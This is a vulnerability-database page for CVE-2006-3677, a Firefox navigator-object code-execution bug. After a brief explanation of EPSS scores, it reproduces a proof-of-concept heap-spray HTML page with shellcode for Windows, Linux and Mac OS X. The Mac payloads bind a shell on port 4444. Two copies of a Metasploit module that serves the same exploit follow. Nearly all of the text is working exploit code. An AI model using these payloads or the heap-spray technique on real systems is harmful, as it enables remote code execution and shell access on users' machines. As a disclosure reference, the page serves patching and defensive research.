CVE-2006-3677 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<!-- Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC http://browserfun.blogspot.com/ The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems. window.navigator = (0x01020304 / 2); java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0); --> <html><body><script> // MoBB Demonstration function Demo() { // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html // https://bugzilla.mozilla.org/show_bug.cgi?id=342267 // CVE-2006-3677 // The Java plugin is required for this to work // win32 = calc.exe var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065'); var fill_win32 = unescape('%u0800'); var addr_win32 = 0x08000800; // linux = touch /tmp/METASPLOIT (unreliable) var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080'); var fill_linux = unescape('%ua8a8'); var addr_linux = -0x58000000; // Integer wrap: 0xa8000000 // mac os x ppc = bind a shell to 4444 var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000'); var fill_macppc = unescape('%u0c0c'); var addr_macppc = 0x0c000000; // mac os x intel = bind a shell to 4444 // Thanks to nemo[at]felinemenace.org for shellcode // Thanks to Todd Manning for the target information and testing var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd'); var fill_macx86 = unescape('%u1c1c'); var addr_macx86 = 0x1c000000; // Start the browser detection var shellcode; var addr; var fill; var ua = '' + navigator.userAgent; if (ua.indexOf('Linux') != -1) { alert('Trying to create /tmp/METASPLOIT'); shellcode = shellcode_linux; addr = addr_linux; fill = fill_linux; } if (ua.indexOf('Windows') != -1) { alert('Trying to launch Calculator'); shellcode = shellcode_win32; addr = addr_win32; fill = fill_win32; } if (ua.indexOf('PPC Mac OS') != -1) { alert('Trying to bind a shell to 4444'); shellcode = shellcode_macppc; addr = addr_macppc; fill = fill_macppc; } if (ua.indexOf('Intel Mac OS') != -1) { alert('Trying to bind a shell to 4444'); shellcode = shellcode_macx86; addr = addr_macx86; fill = fill_macx86; } if (! shellcode) { alert('OS not supported, only attempting a crash!'); shellcode = unescape('%ucccc'); fill = unescape('%ucccc'); addr = 0x02020202; } var b = fill; while (b.length <= 0x400000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } if (window.navigator.javaEnabled) { window.navigator = (addr / 2); try { java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0 ); alert('Patched!'); }catch(e){ alert('No Java plugin installed!'); } } } </script> Clicking the button below may crash your browser!<br><br> <input type='button' onClick='Demo()' value='Start Demo!'> </body></html> # milw0rm.com [2006-07-28]

## # $Id: mozilla_navigatorjava.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core/constants' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => %Q| is_vuln = false; if (window.navigator.javaEnabled && window.navigator.javaEnabled()){ is_vuln = true; } |, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed. }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2006-3677'], ['OSVDB', '27559'], ['BID', '19192'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'], ['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'], ], 'Payload' => { 'Space' => 512, 'BadChars' => "", }, 'Targets' => [ [ 'Firefox 1.5.0.4 Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86, 'Ret' => 0x08000800, 'Fill' => "%u0800", } ], [ 'Firefox 1.5.0.4 Linux x86', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => -0x58000000, 'Fill' => "%ua8a8", } ], [ 'Firefox 1.5.0.4 Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, 'Ret' => 0x0c000000, 'Fill' => "%u0c0c", } ], [ 'Firefox 1.5.0.4 Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, 'Ret' => 0x1c000000, 'Fill' => "%u1c1c", } ], ], 'DisclosureDate' => 'Jul 25 2006' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) return %Q| <html><head> <script> function Exploit() { if (window.navigator.javaEnabled) { var shellcode = unescape("#{enc_code}"); var b = unescape("#{target['Fill']}"); while (b.length <= 0x400000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } window.navigator = (#{target['Ret']} / 2); try { java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0 ); }catch(e){ } } } </script> </head><body onload='Exploit()'>Please wait...</body></html> | end end

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core/constants' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => %Q| is_vuln = false; if (window.navigator.javaEnabled && window.navigator.javaEnabled()){ is_vuln = true; } |, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed. }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3677'], ['OSVDB', '27559'], ['BID', '19192'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'], ['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'], ], 'Payload' => { 'Space' => 512, 'BadChars' => "", }, 'Targets' => [ [ 'Firefox 1.5.0.4 Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86, 'Ret' => 0x08000800, 'Fill' => "%u0800", } ], [ 'Firefox 1.5.0.4 Linux x86', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => -0x58000000, 'Fill' => "%ua8a8", } ], [ 'Firefox 1.5.0.4 Mac OS X PPC', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, 'Ret' => 0x0c000000, 'Fill' => "%u0c0c", } ], [ 'Firefox 1.5.0.4 Mac OS X x86', { 'Platform' => 'osx', 'Arch' => ARCH_X86, 'Ret' => 0x1c000000, 'Fill' => "%u1c1c", } ], ], 'DisclosureDate' => 'Jul 25 2006' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) return %Q| <html><head> <script> function Exploit() { if (window.navigator.javaEnabled) { var shellcode = unescape("#{enc_code}"); var b = unescape("#{target['Fill']}"); while (b.length <= 0x400000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } window.navigator = (#{target['Ret']} / 2); try { java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0 ); }catch(e){ } } } </script> </head><body onload='Exploit()'>Please wait...</body></html> | end end